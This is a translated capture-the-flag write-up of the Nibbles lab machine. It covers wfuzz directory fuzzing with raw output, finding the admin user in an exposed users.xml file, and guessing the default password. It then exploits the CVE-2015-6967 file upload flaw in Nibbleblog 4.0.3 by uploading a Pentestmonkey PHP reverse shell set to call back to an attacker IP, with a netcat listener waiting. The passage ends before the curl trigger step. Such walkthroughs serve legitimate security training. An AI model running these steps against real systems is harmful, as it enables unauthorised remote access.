This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
In this post, we complete the Nibbles write-up. We cover fuzzing, default credentials, exploiting the Arbitrary File Upload vulnerability CVE-2015-6967 and escalating privileges by modifying a script that can be executed through sudo.
❯ wfuzz -c --hc 404 -u http://10.10.10.75/nibbleblog/FUZZ.FUZ2Z -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-txt /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.75/nibbleblog/FUZZ.FUZ2Z Total requests: 441120 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000007: 200 60 L 168 W 2985 Ch "# - php" 000000019: 200 60 L 168 W 2985 Ch "# - php" 000000015: 200 60 L 168 W 2985 Ch "# or send a letter to Creative Commons, 171 Second Street, - php" 000000001: 200 60 L 168 W 2985 Ch "# directory-list-2.3-medium.txt - php" 000000018: 200 60 L 168 W 2985 Ch "# Suite 300, San Francisco, California, 94105, USA. - txt" 000000016: 200 60 L 168 W 2985 Ch "# or send a letter to Creative Commons, 171 Second Street, - txt" 000000021: 200 60 L 168 W 2985 Ch "# Priority ordered case-sensitive list, where entries were found - php" 000000017: 200 60 L 168 W 2985 Ch "# Suite 300, San Francisco, California, 94105, USA. - php" 000000003: 200 60 L 168 W 2985 Ch "# - php" 000000022: 200 60 L 168 W 2985 Ch "# Priority ordered case-sensitive list, where entries were found - txt" 000000014: 200 60 L 168 W 2985 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - txt" 000000020: 200 60 L 168 W 2985 Ch "# - txt" 000000009: 200 60 L 168 W 2985 Ch "# This work is licensed under the Creative Commons - php" 000000013: 200 60 L 168 W 2985 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - php" 000000012: 200 60 L 168 W 2985 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - txt" 000000011: 200 60 L 168 W 2985 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - php" 000000004: 200 60 L 168 W 2985 Ch "# - txt" 000000008: 200 60 L 168 W 2985 Ch "# - txt" 000000010: 200 60 L 168 W 2985 Ch "# This work is licensed under the Creative Commons - txt" 000000002: 200 60 L 168 W 2985 Ch "# directory-list-2.3-medium.txt - txt" 000000006: 200 60 L 168 W 2985 Ch "# Copyright 2007 James Fisher - txt" 000000005: 200 60 L 168 W 2985 Ch "# Copyright 2007 James Fisher - php" 000000023: 200 60 L 168 W 2985 Ch "# on at least 2 different hosts - php" 000000025: 200 60 L 168 W 2985 Ch "# - php" 000000029: 200 60 L 168 W 2985 Ch "index - php" 000000027: 403 11 L 32 W 301 Ch "php" 000000024: 200 60 L 168 W 2985 Ch "# on at least 2 different hosts - txt" 000000026: 200 60 L 168 W 2985 Ch "# - txt" 000000085: 200 10 L 13 W 402 Ch "sitemap - php" 000000251: 200 7 L 15 W 302 Ch "feed - php" 000000517: 200 26 L 96 W 1401 Ch "admin - php" 000001429: 200 0 L 11 W 78 Ch "install - php" 000001587: 200 87 L 174 W 1621 Ch "update - php" 000006590: 200 675 L 5644 W 35148 Ch "LICENSE - txt" 000035634: 200 26 L 187 W 1272 Ch "COPYRIGHT - txt"
Two files are particularly interesting: update.php and admin.php.
Exploitation
Update.Php
This PHP file reveals the version of nibbleblog in use.
Admin.Php
This file displays a login panel protected against brute force: the page blocks us after several attempts, so finding valid credentials is more efficient.
Valid Credentials
Username
Because directory listing is enabled, browsing the directories reveals an xml file containing the valid user admin at http://10.10.10.75/nibbleblog/content/private/users.xml.
While trying default passwords for the admin account, I tested nibbles and… we are in!
Initial Access
With valid credentials and Nibbleblog 4.0.3, we can exploit this vulnerability. This version does not sanitise the extensions of files uploaded through the My Image plugin:
1 - Download and modify the malicious PHP file that will establish our reverse shell. It is available from Pentestmonkey:
1 2
49 │ $ip = '10.10.16.4'; // CHANGE THIS 50 │ $port = 1234; // CHANGE THIS
2 - Visit http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image and upload the reverse shell, ignoring the warnings.
3 - Start a netcat listener on the selected port:
1 2
nc -lvnp 1234 listening on [any] 1234 ...
4 - Use curl against the following location to execute the malicious file: